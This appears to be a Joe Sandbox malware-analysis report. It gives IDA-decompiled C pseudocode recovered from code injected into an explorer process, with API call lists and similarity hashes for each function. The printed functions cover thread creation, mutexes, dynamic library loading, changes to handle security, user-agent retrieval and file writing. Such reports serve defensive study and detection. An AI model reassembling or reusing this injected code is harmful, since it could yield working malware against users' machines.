                            			E000898EE(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                            				intOrPtr _v8;
                            				intOrPtr _v12;
                            				intOrPtr _t45;
                            				intOrPtr _t46;
                            				intOrPtr _t48;
                            				intOrPtr _t49;
                            				void* _t52;
                            				intOrPtr _t53;
                            				intOrPtr _t54;
                            				struct _SECURITY_ATTRIBUTES* _t58;
                            				intOrPtr _t59;
                            				intOrPtr _t61;
                            				intOrPtr _t65;
                            				intOrPtr _t66;
                            				intOrPtr _t67;
                            				intOrPtr _t69;
                            				struct _SECURITY_ATTRIBUTES* _t73;
                            				intOrPtr _t74;
                            				intOrPtr _t77;
                            				intOrPtr _t78;
                            				intOrPtr _t79;
                            				intOrPtr _t82;
                            				intOrPtr _t83;
                            				void* _t86;
                            				intOrPtr _t87;
                            				intOrPtr _t89;
                            				signed int _t92;
                            				intOrPtr _t97;
                            				intOrPtr _t98;
                            				int _t106;
                            				intOrPtr _t110;
                            				signed int _t112;
                            				signed int _t113;
                            				void* _t115;
                            
                            				_push(__ecx);
                            				_push(__ecx);
                            				_v8 = __edx;
                            				_v12 = __ecx;
                            				_t77 =  *0x9e76c; // 0x1d0
                            				_t73 = 0;
                            				if(E0008A4BF(_t77, 0x7530) >= 0) {
                            					_t45 =  *0x9e770; // 0x2854028
                            					_t112 = 0;
                            					_t106 = 0;
                            					do {
                            						_t78 =  *((intOrPtr*)(_t106 + _t45));
                            						if(_t78 == 0) {
                            							L6:
                            							if( *((intOrPtr*)(_t106 + _t45)) == _t73) {
                            								_t113 = _t112 << 5;
                            								if(_v8 == _t73) {
                            									 *(_t113 + _t45 + 0x10) = _t73;
                            									_t46 =  *0x9e770; // 0x2854028
                            									 *(_t113 + _t46 + 0xc) = _t73;
                            									L14:
                            									_t79 =  *0x9e770; // 0x2854028
                            									 *((intOrPtr*)(_t113 + _t79 + 0x14)) = _a8;
                            									_t48 =  *0x9e770; // 0x2854028
                            									 *((intOrPtr*)(_t113 + _t48 + 8)) = _v12;
                            									_t49 = E0008A471(0, 1);
                            									_t82 =  *0x9e770; // 0x2854028
                            									 *((intOrPtr*)(_t113 + _t82 + 0x1c)) = _t49;
                            									_t83 =  *0x9e770; // 0x2854028
                            									_t30 = _t83 + _t113 + 4; // 0x285402c
                            									_t52 = CreateThread(_t73, _t73, E000898A6, _t83 + _t113, _t73, _t30);
                            									_t53 =  *0x9e770; // 0x2854028
                            									 *(_t113 + _t53) = _t52;
                            									_t54 =  *0x9e770; // 0x2854028
                            									_t86 =  *(_t113 + _t54);
                            									if(_t86 != 0) {
                            										SetThreadPriority(_t86, 0xffffffff);
                            										_t87 =  *0x9e770; // 0x2854028
                            										 *0x9e774 =  *0x9e774 + 1;
                            										E0008A4DB( *((intOrPtr*)(_t113 + _t87 + 0x1c)));
                            										_t74 =  *0x9e770; // 0x2854028
                            										_t73 = _t74 + _t113;
                            									} else {
                            										_t59 =  *0x9e684; // 0x286f8f0
                            										 *((intOrPtr*)(_t59 + 0x30))( *((intOrPtr*)(_t113 + _t54 + 0x1c)));
                            										_t61 =  *0x9e770; // 0x2854028
                            										_t37 = _t61 + 0xc; // 0x2854034
                            										_t91 = _t37 + _t113;
                            										if( *((intOrPtr*)(_t37 + _t113)) != _t73) {
                            											E0008861A(_t91,  *((intOrPtr*)(_t113 + _t61 + 0x10)));
                            											_t61 =  *0x9e770; // 0x2854028
                            										}
                            										_t92 = 8;
                            										memset(_t113 + _t61, 0, _t92 << 2);
                            									}
                            									L19:
                            									_t89 =  *0x9e76c; // 0x1d0
                            									E0008A4DB(_t89);
                            									_t58 = _t73;
                            									L20:
                            									return _t58;
                            								}
                            								_t110 = _a4;
                            								_t65 = E00088604(_t110);
                            								_t97 =  *0x9e770; // 0x2854028
                            								 *((intOrPtr*)(_t113 + _t97 + 0xc)) = _t65;
                            								_t66 =  *0x9e770; // 0x2854028
                            								if( *((intOrPtr*)(_t113 + _t66 + 0xc)) == _t73) {
                            									goto L19;
                            								}
                            								 *((intOrPtr*)(_t113 + _t66 + 0x10)) = _t110;
                            								_t67 =  *0x9e770; // 0x2854028
                            								E000886E1( *((intOrPtr*)(_t113 + _t67 + 0xc)), _v8, _t110);
                            								_t115 = _t115 + 0xc;
                            								goto L14;
                            							}
                            							goto L7;
                            						}
                            						_t69 =  *0x9e684; // 0x286f8f0
                            						_push(_t73);
                            						_push(_t78);
                            						if( *((intOrPtr*)(_t69 + 0x2c))() == 0x102) {
                            							_t45 =  *0x9e770; // 0x2854028
                            							goto L7;
                            						}
                            						_t98 =  *0x9e770; // 0x2854028
                            						E0008984A(_t106 + _t98, 0);
                            						_t45 =  *0x9e770; // 0x2854028
                            						goto L6;
                            						L7:
                            						_t106 = _t106 + 0x20;
                            						_t112 = _t112 + 1;
                            					} while (_t106 < 0x1000);
                            					goto L19;
                            				}
                            				_t58 = 0;
                            				goto L20;
                            			}


                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 13136b35abf7dcd7586c6f32f264bee96a55df3916c08bc9964099082c366c6c
                            • Instruction ID: 2208b45a903d8e4e3ebf4af7583ef236fbc94e4c18dfd99628fde9c82a46c99b
                            • Opcode Fuzzy Hash: 13136b35abf7dcd7586c6f32f264bee96a55df3916c08bc9964099082c366c6c
                            • Instruction Fuzzy Hash: 4F515171614640DFEB69EFA8DC84876F7F9FB48314358892EE48687361D735AC02CB42
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 26%
                            			E0008A6A9(void* __ecx, signed int _a4, intOrPtr* _a8) {
                            				intOrPtr _v8;
                            				char _v12;
                            				intOrPtr _t26;
                            				intOrPtr _t27;
                            				intOrPtr _t29;
                            				intOrPtr* _t39;
                            				void* _t47;
                            				intOrPtr _t55;
                            				intOrPtr _t58;
                            				char _t60;
                            
                            				_push(__ecx);
                            				_push(__ecx);
                            				_t50 = _a4;
                            				_t60 = 0;
                            				_v12 = 0;
                            				if(_a4 != 0) {
                            					_t47 = E0008A63B(_t50);
                            					if(_t47 == 0) {
                            						L11:
                            						_t26 = 0;
                            						L12:
                            						L13:
                            						return _t26;
                            					}
                            					_t27 =  *0x9e684; // 0x286f8f0
                            					_t58 =  *((intOrPtr*)(_t27 + 0xe8))(_t47, 0);
                            					if(_t58 == 0) {
                            						L9:
                            						_t29 =  *0x9e684; // 0x286f8f0
                            						 *((intOrPtr*)(_t29 + 0x30))(_t47);
                            						if(_t60 != 0) {
                            							E0008861A( &_v12, 0);
                            						}
                            						goto L11;
                            					}
                            					_t4 = _t58 + 1; // 0x1
                            					_t60 = E00088604(_t4);
                            					_v12 = _t60;
                            					if(_t60 == 0) {
                            						goto L9;
                            					}
                            					_a4 = _a4 & 0;
                            					_push(0);
                            					_v8 = 0;
                            					_push( &_a4);
                            					_push(_t58);
                            					_push(_t60);
                            					while(ReadFile(_t47, ??, ??, ??, ??) != 0) {
                            						if(_a4 == 0) {
                            							if(_v8 != _t58) {
                            								goto L9;
                            							}
                            							_t39 = _a8;
                            							 *((char*)(_t58 + _t60)) = 0;
                            							if(_t39 != 0) {
                            								 *_t39 = _t58;
                            							}
                            							CloseHandle(_t47);
                            							_t26 = _t60;
                            							goto L12;
                            						}
                            						_t55 = _v8 + _a4;
                            						_a4 = _a4 & 0x00000000;
                            						_push(0);
                            						_push( &_a4);
                            						_v8 = _t55;
                            						_push(_t58 - _t55);
                            						_push(_t55 + _t60);
                            					}
                            					goto L9;
                            				}
                            				_t26 = 0;
                            				goto L13;
                            			}














                            APIs
                            • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,0008FA56,00000000,0008F8B5,000AEFE0,0009B990,00000000,0009B990,00000000,00000000,00000615), ref: 0008A733
                            • CloseHandle.KERNELBASE(00000000,?,0008FA56,00000000,0008F8B5,000AEFE0,0009B990,00000000,0009B990,00000000,00000000,00000615,0000034A,00000000,0286FD30,00000400), ref: 0008A776
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseFileHandleRead
                            • String ID:
                            • API String ID: 2331702139-0
                            • Opcode ID: 88356f6b106add4076ec0f83c2a296f690f09df244fe65e188c16454d9d3e760
                            • Instruction ID: 682a662acdfee72883915282426476a47a31b64306a9f0d0b2be5f1f474e3a22
                            • Opcode Fuzzy Hash: 88356f6b106add4076ec0f83c2a296f690f09df244fe65e188c16454d9d3e760
                            • Instruction Fuzzy Hash: DE218D76B04205AFEB50EF64CC84FAA77FCBB05744F10806AF946DB642E770D9409B91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 76%
                            			E0008153B(void* __ecx, void* __edx) {
                            				void* _v8;
                            				void* _t3;
                            				signed int _t4;
                            				intOrPtr _t7;
                            				signed int _t9;
                            				intOrPtr _t10;
                            				void* _t24;
                            
                            				_push(__ecx);
                            				_t3 = CreateMutexA(0, 0, 0);
                            				 *0x9e6f4 = _t3;
                            				if(_t3 == 0) {
                            					L11:
                            					_t4 = _t3 | 0xffffffff;
                            					__eflags = _t4;
                            				} else {
                            					_t3 = CreateMutexA(0, 0, 0);
                            					 *0x9e6dc = _t3;
                            					if(_t3 == 0) {
                            						goto L11;
                            					} else {
                            						_t3 = E00081080(0x4ac);
                            						_v8 = _t3;
                            						if(_t3 == 0) {
                            							goto L11;
                            						} else {
                            							 *0x9e6e8 = E000891A6(_t3, 0);
                            							E000885C2( &_v8);
                            							_t7 = E00088604(0x100);
                            							 *0x9e6f0 = _t7;
                            							if(_t7 != 0) {
                            								 *0x9e6fc = 0;
                            								_t9 = E00088604(0x401);
                            								 *0x9e6d4 = _t9;
                            								__eflags = _t9;
                            								if(_t9 != 0) {
                            									__eflags =  *0x9e6c0; // 0x0
                            									if(__eflags == 0) {
                            										E000915B6(0x88202, 0x8820b);
                            									}
                            									_push(0x61e);
                            									_t24 = 8;
                            									_t10 = E0008E1BC(0x9bd28, _t24); // executed
                            									 *0x9e6a0 = _t10;
                            									_t4 = 0;
                            								} else {
                            									_push(0xfffffffc);
                            									goto L5;
                            								}
                            							} else {
                            								_push(0xfffffffe);
                            								L5:
                            								_pop(_t4);
                            							}
                            						}
                            					}
                            				}
                            				return _t4;
                            			}











                            APIs
                            • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,00085707), ref: 00081545
                            • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,00085707), ref: 0008155B
                              • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateMutex$AllocateHeap
                            • String ID:
                            • API String ID: 704353917-0
                            • Opcode ID: 77af8db251a9b19979746917907dab4167f055f59f2981c2fe2ca95fd249f9b3
                            • Instruction ID: ebe42fdb1850e6894ca3f7a01c19cd8768a376f5bc184f032faea728c04dbff3
                            • Opcode Fuzzy Hash: 77af8db251a9b19979746917907dab4167f055f59f2981c2fe2ca95fd249f9b3
                            • Instruction Fuzzy Hash: A111C871604A82AAFB60FB76EC059AA36E8FFD17B0760462BE5D1D51D1FF74C8018710
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 82%
                            			E00085974(void* __ecx, void* __edx, void* __eflags) {
                            				void* _v8;
                            				char _v12;
                            				char _v52;
                            				intOrPtr _t16;
                            				void* _t19;
                            				intOrPtr _t27;
                            				void* _t42;
                            
                            				_t42 = __edx;
                            				_v8 = 0;
                            				E0008A86D( &_v52, __ecx, __eflags);
                            				_t16 =  *0x9e688; // 0xb0000
                            				if( *((intOrPtr*)(_t16 + 0x644)) > 0) {
                            					L1:
                            					_t27 =  *0x9e684; // 0x286f8f0
                            					 *((intOrPtr*)(_t27 + 0xb4))(0x32);
                            					goto L1;
                            				}
                            				_push(0);
                            				_push( &_v52);
                            				_push("\\");
                            				_v12 = E00089292("Global");
                            				_t19 = E0008590C(_t18, _t42,  &_v8); // executed
                            				__eflags = _t19 - 1;
                            				if(_t19 == 1) {
                            					CloseHandle(_v8);
                            					_v8 = 0;
                            					E0008590C( &_v52, _t42,  &_v8); // executed
                            				}
                            				E0008861A( &_v12, 0xffffffff);
                            				return _v8;
                            			}











                            APIs
                            • CloseHandle.KERNELBASE(00085DD4,?,?,?,?,00000002), ref: 000859DD
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseHandle
                            • String ID: Global
                            • API String ID: 2962429428-4020866741
                            • Opcode ID: bf963d4d9802a3cf92ade42826878ca464ff62fd084caeceb66e864cea665a67
                            • Instruction ID: ad9e46771b38e1f6345cb022d52bc1c5a3711b7f461b92f87be1531e78fdffdd
                            • Opcode Fuzzy Hash: bf963d4d9802a3cf92ade42826878ca464ff62fd084caeceb66e864cea665a67
                            • Instruction Fuzzy Hash: 42117C72A04118EBDB00FB98ED45CDDB7F8FB90321F20006AF485E7292EA309E00CB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 47%
                            			E0008E1BC(void* __ecx, void* __edx, intOrPtr _a4) {
                            				char _v8;
                            				char _t5;
                            				struct HINSTANCE__* _t7;
                            				void* _t10;
                            				void* _t12;
                            				void* _t22;
                            				void* _t25;
                            
                            				_push(__ecx);
                            				_t12 = __ecx;
                            				_t22 = __edx;
                            				_t5 = E000895C7(_a4);
                            				_t25 = 0;
                            				_v8 = _t5;
                            				_push(_t5);
                            				if(_a4 != 0x7c3) {
                            					_t7 = LoadLibraryA(); // executed
                            				} else {
                            					_t7 = GetModuleHandleA();
                            				}
                            				if(_t7 != 0) {
                            					_t10 = E0008E171(_t12, _t22, _t7); // executed
                            					_t25 = _t10;
                            				}
                            				E000885C2( &_v8);
                            				return _t25;
                            			}











                            APIs
                            • GetModuleHandleA.KERNEL32(00000000,00000000,00000001,?,0009BA28), ref: 0008E1DE
                            • LoadLibraryA.KERNEL32(00000000,00000000,00000001,?,0009BA28), ref: 0008E1EB
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: HandleLibraryLoadModule
                            • String ID:
                            • API String ID: 4133054770-0
                            • Opcode ID: 34ee8c9432c501ef63b31a96de4864626031fe048823fd25d1229eb6e9450f54
                            • Instruction ID: eaac88a08efcd0d2a3f1dbc0b3101d04e6d50373736468e8fc033cf0e2f21452
                            • Opcode Fuzzy Hash: 34ee8c9432c501ef63b31a96de4864626031fe048823fd25d1229eb6e9450f54
                            • Instruction Fuzzy Hash: EBF0EC32700114ABDB44BB6DDC898AEB7EDBF54790714403AF406D3251DE70DE0087A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 65%
                            			E00082C8F(void* __ecx, void* __edx, void* __eflags, void* __fp0) {
                            				WCHAR* _v8;
                            				char _v12;
                            				char _v44;
                            				char _v564;
                            				char _v1084;
                            				void* __esi;
                            				void* _t23;
                            				struct _SECURITY_ATTRIBUTES* _t25;
                            				int _t27;
                            				char _t32;
                            				char _t38;
                            				intOrPtr _t39;
                            				void* _t40;
                            				WCHAR* _t41;
                            				void* _t54;
                            				char* _t60;
                            				char* _t63;
                            				void* _t70;
                            				WCHAR* _t71;
                            				intOrPtr* _t73;
                            
                            				_t70 = __ecx;
                            				_push(__ecx);
                            				E0008B700(__edx,  &_v44, __eflags, __fp0);
                            				_t52 = _t70;
                            				if(E0008BB8D(_t70) == 0) {
                            					_t23 = E00082BA4( &_v1084, _t70, 0x104); // executed
                            					_pop(_t54);
                            					__eflags = _t23;
                            					if(__eflags == 0) {
                            						_t71 = E00082C64( &_v1084, __eflags);
                            					} else {
                            						E0008B012(_t54,  &_v564); // executed
                            						_t32 = E0008109A(_t54, 0x375);
                            						_push(0);
                            						_v12 = _t32;
                            						_push( &_v44);
                            						_t60 = "\\";
                            						_push(_t60);
                            						_push(_t32);
                            						_push(_t60);
                            						_push( &_v564);
                            						_push(_t60);
                            						_t71 = E000892E5( &_v1084);
                            						E000885D5( &_v12);
                            					}
                            				} else {
                            					_t38 = E0008109A(_t52, 0x4e0);
                            					 *_t73 = 0x104;
                            					_v12 = _t38;
                            					_t39 =  *0x9e684; // 0x286f8f0
                            					_t40 =  *((intOrPtr*)(_t39 + 0xe0))(_t38,  &_v564);
                            					_t78 = _t40;
                            					if(_t40 != 0) {
                            						_t41 = E0008109A( &_v564, 0x375);
                            						_push(0);
                            						_v8 = _t41;
                            						_push( &_v44);
                            						_t63 = "\\";
                            						_push(_t63);
                            						_push(_t41);
                            						_push(_t63);
                            						_t71 = E000892E5( &_v564);
                            						E000885D5( &_v8);
                            					} else {
                            						_t71 = E00082C64( &_v44, _t78);
                            					}
                            					E000885D5( &_v12);
                            				}
                            				_v8 = _t71;
                            				_t25 = E0008B269(_t71);
                            				if(_t25 == 0) {
                            					_t27 = CreateDirectoryW(_t71, _t25); // executed
                            					if(_t27 == 0 || E0008B269(_t71) == 0) {
                            						E0008861A( &_v8, 0xfffffffe);
                            						_t71 = _v8;
                            					}
                            				}
                            				return _t71;
                            			}
























                            APIs
                            • CreateDirectoryW.KERNELBASE(00000000,00000000,00000000), ref: 00082DA1
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateDirectory
                            • String ID:
                            • API String ID: 4241100979-0
                            • Opcode ID: 7c4a0f093625b4fcaa1e26c862cc05219dd604dd7efe2f6a97326133e3ac1df4
                            • Instruction ID: 661ddabdbbf5835fe1c09d22864260864737aa38d39f94c9f57271a24964c515
                            • Opcode Fuzzy Hash: 7c4a0f093625b4fcaa1e26c862cc05219dd604dd7efe2f6a97326133e3ac1df4
                            • Instruction Fuzzy Hash: D931A4B1914314AADB24FBA4CC51AFE77ACBF04350F040169F985E3182EF749F408BA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00085AFF(intOrPtr __edx, void* __fp0) {
                            				short _v30;
                            				short _v32;
                            				short _v34;
                            				short _v36;
                            				intOrPtr* _t22;
                            				intOrPtr _t23;
                            				signed int _t30;
                            				intOrPtr _t38;
                            				intOrPtr* _t40;
                            				intOrPtr _t44;
                            				intOrPtr _t45;
                            				intOrPtr* _t46;
                            				signed int _t47;
                            				void* _t55;
                            
                            				_t55 = __fp0;
                            				_t45 = __edx;
                            				_t47 = 0;
                            				_t22 = E00088604(0x14);
                            				_t38 =  *0x9e688; // 0xb0000
                            				_t46 = _t22;
                            				if( *((short*)(_t38 + 0x22a)) == 0x3a) {
                            					_v36 =  *((intOrPtr*)(_t38 + 0x228));
                            					_v34 =  *((intOrPtr*)(_t38 + 0x22a));
                            					_v32 =  *((intOrPtr*)(_t38 + 0x22c));
                            					_v30 = 0;
                            					GetDriveTypeW( &_v36); // executed
                            				}
                            				 *_t46 = 2;
                            				 *(_t46 + 4) = _t47;
                            				_t23 =  *0x9e688; // 0xb0000
                            				 *((intOrPtr*)(_t46 + 8)) =  *((intOrPtr*)(_t23 + 0x224));
                            				_t40 = E00085A7B( *((intOrPtr*)(_t23 + 0x224)), _t45, _t55);
                            				 *((intOrPtr*)(_t46 + 0xc)) = _t40;
                            				if(_t40 == 0) {
                            					L9:
                            					if(E00082DCB() == 0) {
                            						goto L11;
                            					} else {
                            						_t47 = _t47 | 0xffffffff;
                            					}
                            				} else {
                            					_t45 =  *_t40;
                            					_t30 = _t47;
                            					if(_t45 == 0) {
                            						goto L9;
                            					} else {
                            						_t44 =  *((intOrPtr*)(_t40 + 4));
                            						while( *((intOrPtr*)(_t44 + _t30 * 8)) != 0x3b) {
                            							_t30 = _t30 + 1;
                            							if(_t30 < _t45) {
                            								continue;
                            							} else {
                            								goto L9;
                            							}
                            							goto L12;
                            						}
                            						if( *((intOrPtr*)(_t44 + 4 + _t30 * 8)) != _t47) {
                            							L11:
                            							E00084D6D(_t46, _t45, _t55);
                            						} else {
                            							goto L9;
                            						}
                            					}
                            				}
                            				L12:
                            				E0008A39E();
                            				E0008A39E();
                            				return _t47;
                            			}


















                            APIs
                              • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                            • GetDriveTypeW.KERNELBASE(?), ref: 00085B4F
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateDriveHeapType
                            • String ID:
                            • API String ID: 414167704-0
                            • Opcode ID: 5fad3a3b786f27ccd02a28058a2f299cb1a65abd77b56508b1054d3f76a11603
                            • Instruction ID: 556f522260d7e6bdf941df906934654c795a6f01da19a51ea332bd0742bdc193
                            • Opcode Fuzzy Hash: 5fad3a3b786f27ccd02a28058a2f299cb1a65abd77b56508b1054d3f76a11603
                            • Instruction Fuzzy Hash: C4213638600B169BC714BFA4DC489ADB7B0FF58325B24813EE49587392FB32C842CB85
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 44%
                            			E0008BC7A(void* __ecx, void* __edx) {
                            				char _v8;
                            				char _v12;
                            				char _v16;
                            				char _v20;
                            				char _v24;
                            				char _t18;
                            				intOrPtr _t19;
                            				intOrPtr _t27;
                            				intOrPtr _t30;
                            				intOrPtr _t36;
                            				intOrPtr _t38;
                            				char _t39;
                            
                            				_t39 = 0;
                            				_t38 =  *0x9e674; // 0x214
                            				_v8 = 0;
                            				_v12 = 0;
                            				_v20 = 0;
                            				_v16 = 0;
                            				_t18 = E000895E1(__ecx, 0x84b);
                            				_push(0);
                            				_v24 = _t18;
                            				_push( &_v8);
                            				_push(1);
                            				_push(_t18);
                            				_t19 =  *0x9e68c; // 0x286fab8
                            				if( *((intOrPtr*)(_t19 + 0x84))() != 0) {
                            					_push( &_v16);
                            					_push( &_v12);
                            					_push( &_v20);
                            					_t27 =  *0x9e68c; // 0x286fab8
                            					_push(_v8);
                            					if( *((intOrPtr*)(_t27 + 0x88))() != 0) {
                            						_push(_v12);
                            						_t30 =  *0x9e68c; // 0x286fab8
                            						_push(0);
                            						_push(0);
                            						_push(0);
                            						_push(0x10);
                            						_push(6);
                            						_push(_t38); // executed
                            						if( *((intOrPtr*)(_t30 + 0x8c))() == 0) {
                            							_t39 = 1;
                            						}
                            					}
                            					_t36 =  *0x9e68c; // 0x286fab8
                            					 *((intOrPtr*)(_t36 + 0x10))(_v8);
                            				}
                            				E000885D5( &_v24);
                            				return _t39;
                            			}
















                            APIs
                            • SetSecurityInfo.ADVAPI32(00000214,00000006,00000010,00000000,00000000,00000000,?,?,00083268,?,?,00000000,?,?,?,00085721), ref: 0008BCE9
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: InfoSecurity
                            • String ID:
                            • API String ID: 3528565900-0
                            • Opcode ID: 49105266334ca50b45e4c17bdeae0f8f274821862b6dd8d3608f6b368af892b6
                            • Instruction ID: 4b82ffe8c45477c1650446b5343723a2aeaa491c0a074740823efd8a3710dd5b
                            • Opcode Fuzzy Hash: 49105266334ca50b45e4c17bdeae0f8f274821862b6dd8d3608f6b368af892b6
                            • Instruction Fuzzy Hash: 54113A72A00219BBDB10EF95DC49EEEBBBCFF04740F1040A6B545E7151DBB09A01CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 71%
                            			E0008E450(void* __ecx, void* __edx) {
                            				char _v8;
                            				intOrPtr* _t5;
                            				intOrPtr _t10;
                            				intOrPtr* _t11;
                            				void* _t12;
                            
                            				_push(__ecx);
                            				_t5 =  *0x9e6b0; // 0x2853258
                            				if( *_t5 == 0) {
                            					_v8 = E000895C7(0x2a7);
                            					 *0x9e788 = E000891A6(_t6, 0);
                            					E000885C2( &_v8);
                            					goto L4;
                            				} else {
                            					_v8 = 0x100;
                            					_t10 = E00088604(0x101);
                            					 *0x9e788 = _t10;
                            					_t11 =  *0x9e6b0; // 0x2853258
                            					_t12 =  *_t11(0, _t10,  &_v8); // executed
                            					if(_t12 == 0) {
                            						L4:
                            						return 0;
                            					} else {
                            						return E0008861A(0x9e788, 0xffffffff) | 0xffffffff;
                            					}
                            				}
                            			}









                            APIs
                              • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                            • ObtainUserAgentString.URLMON(00000000,00000000,00000100,00000100,?,0008E4F7), ref: 0008E481
                              • Part of subcall function 0008861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AgentAllocateFreeObtainStringUser
                            • String ID:
                            • API String ID: 471734292-0
                            • Opcode ID: fadecc4150335b3d5cba4393e5bf78e676c03b8a8521bdaa611949d1b81c303c
                            • Instruction ID: f91671ab82a028632dec16c50dcaaaafc6d594eba443ed6fbe21b10f95aa2484
                            • Opcode Fuzzy Hash: fadecc4150335b3d5cba4393e5bf78e676c03b8a8521bdaa611949d1b81c303c
                            • Instruction Fuzzy Hash: 76F0CD30608240EBFB84FBB4DC4AAA977E0BB10324F644259F056D32D2EEB49D009715
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 88%
                            			E0008A65C(void* __ecx, void* __edx, intOrPtr _a4) {
                            				long _v8;
                            				void* _v12;
                            				void* _t13;
                            				void* _t21;
                            				void* _t23;
                            				void* _t26;
                            
                            				_t23 = __ecx;
                            				_push(__ecx);
                            				_push(__ecx);
                            				_t26 = 0;
                            				_v12 = __ecx;
                            				_t21 = __edx;
                            				if(_a4 == 0) {
                            					L3:
                            					_t13 = 1;
                            				} else {
                            					while(1) {
                            						_v8 = _v8 & 0x00000000;
                            						if(WriteFile(_t23, _t26 + _t21, _a4 - _t26,  &_v8, 0) == 0) {
                            							break;
                            						}
                            						_t26 = _t26 + _v8;
                            						_t23 = _v12;
                            						if(_t26 < _a4) {
                            							continue;
                            						} else {
                            							goto L3;
                            						}
                            						goto L4;
                            					}
                            					_t13 = 0;
                            				}
                            				L4:
                            				return _t13;
                            			}










                            APIs
                            • WriteFile.KERNELBASE(00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00088F51,?), ref: 0008A689
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: FileWrite
                            • String ID:
                            • API String ID: 3934441357-0
                            • Opcode ID: 5df19e21d3ddb09ad6c4c11454da19da2bcff3529875a62912f8edc0b597093c
                            • Instruction ID: 0b494a87cdc3703bbe533562170335e27c5b07854cca77c3918aadfd965e8834
                            • Opcode Fuzzy Hash: 5df19e21d3ddb09ad6c4c11454da19da2bcff3529875a62912f8edc0b597093c
                            • Instruction Fuzzy Hash: 3EF01D72A10128BFEB10DF98C884BAA7BECFB05781F14416AB545E7144E670EE4087A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E0008A5F7(WCHAR* __ecx, long __edx) {
                            				intOrPtr _t6;
                            				long _t12;
                            				void* _t13;
                            
                            				_t12 = __edx;
                            				_t13 = CreateFileW(__ecx, 0x40000000, 0, 0, __edx, 0x80, 0);
                            				if(_t13 != 0xffffffff) {
                            					if(_t12 == 4) {
                            						_t6 =  *0x9e684; // 0x286f8f0
                            						 *((intOrPtr*)(_t6 + 0x80))(_t13, 0, 0, 2);
                            					}
                            					return _t13;
                            				}
                            				return 0;
                            			}







                            APIs
                            • CreateFileW.KERNELBASE(00000000,40000000,00000000,00000000,00000001,00000080,00000000,00000000,00000000,00000000,00088F39), ref: 0008A612
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateFile
                            • String ID:
                            • API String ID: 823142352-0
